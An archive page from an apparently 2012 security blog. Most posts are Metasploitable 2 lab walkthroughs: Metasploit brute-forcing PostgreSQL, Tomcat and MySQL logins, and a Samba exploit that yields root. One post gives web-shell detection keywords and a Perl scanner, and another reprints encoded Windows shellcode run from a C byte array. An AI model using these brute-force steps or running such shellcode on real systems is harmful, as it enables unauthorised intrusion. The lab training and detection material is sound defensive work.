Archiwum

Archiwum autora

Attacking PostgreSQL On Metasplitable 2

18 czerwca, 2012 Dodaj komentarz

Attacking PostgreSQL On Metasplitable 2

In this article we will see how we can attack a system that contains a PostgreSQL database.

Lets say that we have perform a port scan on a server and we have identify that is running a PostgreSQL database at port 5432.

Scanning with nmap:

nmap -sV 192.168.235.129

nmap -sV 192.168.235.129

nmap -sV 192.168.235.129

We will open the metasploit framework and we will looking „postgresql”:

msf > search postgresql

Matching Modules
================

Name                                         Disclosure Date  Rank       Description
—-                                         —————  —-       ———–
auxiliary/admin/postgres/postgres_readfile                    normal     PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql                         normal     PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login                     normal     PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version                   normal     PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload    2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution

We will use the postgres_login scanner.

Usage Information:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(postgres_login) > run

Set the target address range:

msf>set RHOSTS 192.168.235.129

and

msf  auxiliary(postgres_login) > exploit

[*] 192.168.235.129:5432 Postgres – [01/21] – Trying username:’postgres’ with password:” on database ‚template1’
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ‚postgres’:”
[-] 192.168.235.129:5432 Postgres – [01/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [02/21] – Trying username:” with password:” on database ‚template1′
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ”:”
[-] 192.168.235.129:5432 Postgres – [02/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [03/21] – Trying username:’scott’ with password:” on database ‚template1’
[-] 192.168.235.129:5432 Postgres – Invalid username or password: ‚scott’:”
[-] 192.168.235.129:5432 Postgres – [03/21] – Username/Password failed.
[*] 192.168.235.129:5432 Postgres – [04/21] – Trying username:’admin’ with password:” on database ‚template1’

……………………………………………………………………………………………………………………………………….

This scanner is already configured to use the default wordlists about postgreSQL databases of metasploit framework so we will use them in this case:

 USERPASS_FILE     C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_userpass.txt 

no File containing (space-seperated) users and passwords, one pair per line

USER_FILE         C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_user.txt     

no File containing users, one per line

Waiting,waiting and:

success

Success

We have user name – „postgres” ,and password – „postgres

Now we can login as posgres user:

login

Source:

1.Metasploit Unleashed – http://www.offensive-security.com/metasploit-unleashed/Admin_Postgres_Modules

2.PostgreSQL Login Utility – http://www.metasploit.com/modules/auxiliary/scanner/postgres/postgres_login

How to find backdoor PHP shell scripts on a server

17 czerwca, 2012 1 komentarz

How to find backdoor PHP shell scripts on a server

When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web page interface where they can download and upload, view or modify files, create directories, and otherwise manage the site using PHP’s ability to read and write files and pass operating system commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.

Backdoor scripts often need to use PHP commands that most legitimate scripts don’t, so you can search the files in your site for those commands. There are search utility programs you can use for finding text in files:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab
  • chmod
  • mkdir
  • „ (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/

Or

grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following script ( source )

#!/usr/bin/perl -w
#usage: ./findshell.pl <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;
my $sens = <a href="http://perldoc.perl.org/functions/shift.html">shift</a>  || 10;
my $folder = <a href="http://perldoc.perl.org/functions/shift.html">shift</a> || './';
find(\&backdoor, "$folder");
sub backdoor {
    if ((/\.(php|txt)/)){
       <a href="http://perldoc.perl.org/functions/open.html">open</a> (my $IN,"<$_") || <a href="http://perldoc.perl.org/functions/die.html">die</a> "can not open datei $File::Find::name: $!";
       my @file =  <$IN>;
       #maybe evil stuffs
       my $score = <a href="http://perldoc.perl.org/functions/grep.html">grep</a> (/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid  \(|fileperms\(/i,@file);
       #probably evil stuffs
       my $tempscore = <a href="http://perldoc.perl.org/functions/grep.html">grep</a>(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
       $score +=  50 *  $tempscore;
       <a href="http://perldoc.perl.org/functions/print.html">print</a> "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens-1 );
       <a href="http://perldoc.perl.org/functions/close.html">close</a> $IN;
  }elsif((/\.(jpg|jpeg|gif|png|tar|zip|gz|rar|pdf)/)){
       <a href="http://perldoc.perl.org/functions/open.html">open</a> (my $IN,"<$_") || (<a href="http://perldoc.perl.org/functions/print.html">print</a> "can not open datei $File::Find::name: $!" && next);
       <a href="http://perldoc.perl.org/functions/print.html">print</a> "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if <a href="http://perldoc.perl.org/functions/grep.html">grep</a> /(\<\?php|include(\ |\())/i, <$IN>;
       <a href="http://perldoc.perl.org/functions/close.html">close</a> $IN;
  }
}

Source:

Web Shell Detection Using NeoPI

Kategorie:BackDoor Tagi: ,

Metasploitable 2 – Apache Tomcat Exploitation

16 czerwca, 2012 Dodaj komentarz

Metasploitable 2 – Apache Tomcat Exploitation

In this post we will focus on the Apache Tomcat Web server and how we can discover the administrator’s credentials in order to gain access to the remote system – Metasploitable 2.

So we are performing our internal penetration testing and we have discovered the Apache Tomcat running on a remot system metasploitable linux 2 on port 8180.
nmap scan

nmap scan

Our next step will be to start metasploit framework and to search „tomcat”

msf> search tomcat

We have found an auxiliary scanner which will be the tool for our attempt to login to the Tomcat Application Manager.

search tomcat

tomcat

So we run the scanner and we are waiting to see if it will discover any valid credentials:

run exploit

run exploit

We see User – tomcat , password – tomcat

Tomcat

Tomcat

Source:

Kategorie:Metasploit

Metasploitable 2 – Bruteforce MySQL Using Metasploit

15 czerwca, 2012 Dodaj komentarz

Metasploitable 2 – Bruteforce MySQL Using Metasploit

I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable 2 distribution I mentioned in my previous post.

This is very simple:

c:\Program Files\Rapid7\framework\msfconsole.bat

Type :

msf>db_connect bt:my_pass@localhost:5432/msf3

msf>services

services

services

We see ,mysql is running

192.168.235.129  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5

Search for an exploit:

msf>search mysql

search mysql

search mysql

Choose:

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

settings

Settings

Run exploit:

msf auxiliary(mysql_login) > exploit

[*] 192.168.235.129:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.235.129:3306 Trying username:'admin' with password:''
[*] 192.168.235.129:3306 failed to login as 'admin' with password ''
192.168.235.129[*] 192.168.235.129:3306 Trying username:'god' with password:''
[*] 192.168.235.129:3306 failed to login as 'god' with password ''

...........................................

The list is long

...........................................

[*] 192.168.235.129:3306 Trying username:'root' with password:''
[+] 192.168.235.129:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

User -"root" , No passaword

mysql -h 192.168.235.129 -u root

mysql -h 192.168.235.129 -u root


Kategorie:Metasploit

Rapid7 – Metasploitable 2

14 czerwca, 2012 4 Komentarze

Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from Sourceforge.net and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. (read all)

Metasploitable 2 running on VMware  looks like this:

Rapid7

Metasploitable2

Here we go


c:\rapid7\metasploit\msfconsole.bat

Check the version

msf > version
Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
msf >

Connect to the database:

Connect To DataBase

Connect To the DataBase

Now we should be able to enter the db_nmap command from within msfconsole to run nmap and have its results automatically stored in our new database.

msf > db_nmap -sS -A 192.168.235.129

db_nmap

Cd..

[*] Nmap: MAC Address: 00:0C:29:BF:08:FB (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS details: Linux 2.6.9 – 2.6.31
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   Name: WORKGROUP\Unknown
[*] Nmap: |_  System time: 2012-06-14 21:07:53 UTC-4
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.44 ms 192.168.235.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
msf >

Result:

msf > services

Services
========

host             port  proto  name         state  info
—-             —-  —–  —-         —–  —-
192.168.235.129  21    tcp    ftp                                   open   vsftpd 2.3.4
192.168.235.129  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1
protocol 2.0
192.168.235.129  23    tcp    telnet       open   Linux telnetd
192.168.235.129  25    tcp    smtp         open   Postfix smtpd
192.168.235.129  53    tcp    domain       open   ISC BIND 9.4.2
192.168.235.129  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.235.129  110   tcp    pop3-proxy   open   AVG pop3 proxy broken
192.168.235.129  111   tcp    rpcbind      open   2 rpc #100000
192.168.235.129  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.235.129  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.235.129  512   tcp    exec         open   netkit-rsh rexecd
192.168.235.129  513   tcp    login        open
192.168.235.129  514   tcp    shell        open
192.168.235.129  1099  tcp    jrmi         open   GNU Classpath grmiregistry
192.168.235.129  1524  tcp    ingreslock   open
192.168.235.129  2049  tcp    nfs          open   2-4 rpc #100003
192.168.235.129  2121  tcp    ccproxy-ftp  open
192.168.235.129  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
192.168.235.129  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 – 8.3.7
192.168.235.129  5900  tcp    vnc          open   VNC protocol 3.3
192.168.235.129  6000  tcp    x11          open   access denied
192.168.235.129  6667  tcp    irc          open   Unreal ircd
192.168.235.129  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
192.168.235.129  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Let’s search for a Samba exploit and try it against the system:

msf>search samba

search samba

msf>search samba

The first shot is:

msf > use exploit/multi/samba/usermap_script

msf  exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                        yes       The target address
RPORT  139              yes       The target port

Exploit target:

Id  Name
—  —-
0   Automatic

msf  exploit(usermap_script) > set RHOST 192.168.235.129
RHOST => 192.168.235.129
msf  exploit(usermap_script) > exploit

Result:

exploit

exploit

I’m „super user”

id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Kategorie:Metasploit

Win32/7 Ultimate mspaint.exe ShellCode

8 czerwca, 2012 Dodaj komentarz

win32/7 Ultimate mspaint.exe ShellCode

Author: Ayrbyte

Link : –

Version: – Category: Wi32/7

local Tested on: Windows 7 Ultimate

Code : c++

(diasembly code)

00403000   BB 449BB40E      MOV EBX,0EB49B44
00403005   33C9             XOR ECX,ECX
00403007   DBC4             FCMOVNB ST,ST(4)
00403009   B1 32            MOV CL,32
0040300B   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
0040300F   5D               POP EBP
00403010   315D 13          XOR DWORD PTR SS:[EBP+13],EBX
00403013   83C5 04          ADD EBP,4
00403016   035D 0F          ADD EBX,DWORD PTR SS:[EBP+F]
00403019  -E2 B1            LOOPD SHORT msgbox.00402FCC
0040301B   67:5C            POP ESP
0040301D   8739             XCHG DWORD PTR DS:[ECX],EDI
0040301F   98               CWDE
00403020   9D               POPFD
00403021   F8               CLC
00403022   B0 7D            MOV AL,7D
00403024   AC               LODS BYTE PTR DS:[ESI]
00403025   2AA6 F69DFAAD    SUB AH,BYTE PTR DS:[ESI+ADFA9DF6]
0040302B   5B               POP EBX
0040302C   2E:70 E3         JO SHORT msgbox.00403012
0040302F   4F               DEC EDI
00403030   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
00403031   F4               HLT
00403032   2B7F 0E          SUB EDI,DWORD PTR DS:[EDI+E]
00403035   B2 0D            MOV DL,0D
00403037   4E               DEC ESI
00403038   8F               ???
00403039  -72 91            JB SHORT msgbox.00402FCC
0040303B   1C 53            SBB AL,53
0040303D   14 6D            ADC AL,6D
0040303F   5F               POP EDI
00403040   80F6 4C          XOR DH,4C
00403043   90               NOP
00403044   D5 F7            AAD 0F7
00403046   89CD             MOV EBP,ECX
00403048   16               PUSH SS
00403049   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
0040304A   42               INC EDX
0040304B   99               CDQ
0040304C   855A E7          TEST DWORD PTR DS:[EDX-19],EBX
0040304F   DF15 5A275425    FIST WORD PTR DS:[2554275A]
00403055   24 42            AND AL,42
00403057   AB               STOS DWORD PTR ES:[EDI]
00403058   D29E 4DFC4B94    RCR BYTE PTR DS:[ESI+944BFC4D],CL
0040305E   05 E4E0F2B5      ADD EAX,B5F2E0E4
00403063   15 24E1895C      ADC EAX,5C89E124
00403068   41               INC ECX
00403069   D27A 5F          SAR BYTE PTR DS:[EDX+5F],CL
0040306C   832A 83          SUB DWORD PTR DS:[EDX],-7D
0040306F   51               PUSH ECX
00403070  ^EB E1            JMP SHORT msgbox.00403053
00403072   BA 5DE6F8FB      MOV EDX,FBF8E65D
00403077   5A               POP EDX
00403078   198F F798A488    SBB DWORD PTR DS:[EDI+88A498F7],ECX
0040307E   CC               INT3
0040307F   E3 72            JECXZ SHORT msgbox.004030F3
00403081   1C D0            SBB AL,0D0
00403083   44               INC ESP
00403084   F0:8630          LOCK XCHG BYTE PTR DS:[EAX],DH
00403087  ^74 D5            JE SHORT msgbox.0040305E
00403089   51               PUSH ECX
0040308A   B3 7A            MOV BL,7A
0040308C   92               XCHG EAX,EDX
0040308D   16               PUSH SS
0040308E   9B               WAIT
0040308F   9E               SAHF
00403090   25 FA909BAE      AND EAX,AE9B90FA
00403095   FD               STD
00403096   76 2A            JBE SHORT msgbox.004030C2
00403098   F4               HLT
00403099   D952 76          FST DWORD PTR DS:[EDX+76]
0040309C   AE               SCAS BYTE PTR ES:[EDI]
0040309D   40               INC EAX
0040309E   C3               RETN
0040309F   D201             ROL BYTE PTR DS:[ECX],CL
004030A1   7C 13            JL SHORT msgbox.004030B6
004030A3   BA FED85829      MOV EDX,2958D8FE
004030A8   EA 5B0324ED EE3E JMP FAR 3EEE:ED24035B
004030AF   01ED             ADD EBP,EBP
004030B1   F0:40            LOCK INC EAX
004030B3   2286 C1CBADD1    AND AL,BYTE PTR DS:[ESI+D1ADCBC1]
004030B9   DD1E             FSTP QWORD PTR DS:[ESI]
004030BB   8A2E             MOV CH,BYTE PTR DS:[ESI]
004030BD   94               XCHG EAX,ESP
004030BE   02BB A671D7F9    ADD BH,BYTE PTR DS:[EBX+F9D771A6]
004030C4   AA               STOS BYTE PTR ES:[EDI]
004030C5   8102 3DD301A6    ADD DWORD PTR DS:[EDX],A601D33D
004030CB   BE 2019C3BB      MOV ESI,BBC31920
004030D0   6D               INS DWORD PTR ES:[EDI],DX
004030D1   9D               POPFD
004030D2   38B6 FE483E65    CMP BYTE PTR DS:[ESI+653E48FE],DH
004030D8   FE               ???
004030D9   58               POP EAX
004030DA   53               PUSH EBX
004030DB   FA               CLI
004030DC   70 02            JO SHORT msgbox.004030E0
004030DE   C2 9204          RETN 492
004030E1   C400             LES EAX,FWORD PTR DS:[EAX]

Exploit :

#include <windows.h>
char string[] =
"\xbb\x44\x9b\xb4\x0e\x33\xc9\xdb\xc4\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x5d\x13\x83\xc5\x04\x03\x5d\x0f\xe2\xb1\x67\x5c\x87\x39\x98\x9d\xf8\xb0\x7d\xac\x2a\xa6\xf6\x9d\xfa\xad\x5b\x2e\x70\xe3\x4f\xa5\xf4\x2b\x7f\x0e\xb2\x0d\x4e\x8f\x72\x91\x1c\x53\x14\x6d\x5f\x80\xf6\x4c\x90\xd5\xf7\x89\xcd\x16\xa5\x42\x99\x85\x5a\xe7\xdf\x15\x5a\x27\x54\x25\x24\x42\xab\xd2\x9e\x4d\xfc\x4b\x94\x05\xe4\xe0\xf2\xb5\x15\x24\xe1\x89\x5c\x41\xd2\x7a\x5f\x83\x2a\x83\x51\xeb\xe1\xba\x5d\xe6\xf8\xfb\x5a\x19\x8f\xf7\x98\xa4\x88\xcc\xe3\x72\x1c\xd0\x44\xf0\x86\x30\x74\xd5\x51\xb3\x7a\x92\x16\x9b\x9e\x25\xfa\x90\x9b\xae\xfd\x76\x2a\xf4\xd9\x52\x76\xae\x40\xc3\xd2\x01\x7c\x13\xba\xfe\xd8\x58\x29\xea\x5b\x03\x24\xed\xee\x3e\x01\xed\xf0\x40\x22\x86\xc1\xcb\xad\xd1\xdd\x1e\x8a\x2e\x94\x02\xbb\xa6\x71\xd7\xf9\xaa\x81\x02\x3d\xd3\x01\xa6\xbe\x20\x19\xc3\xbb\x6d\x9d\x38\xb6\xfe\x48\x3e\x65\xfe\x58\x53\xfa\x70\x02\xc2\x92\x04\xc4";
int main()
{
  ((void (*)(void))string)();
}
Kategorie:Exploit Tagi:

control – windows firewall from the command line

7 czerwca, 2012 Dodaj komentarz
Kategorie:FireWall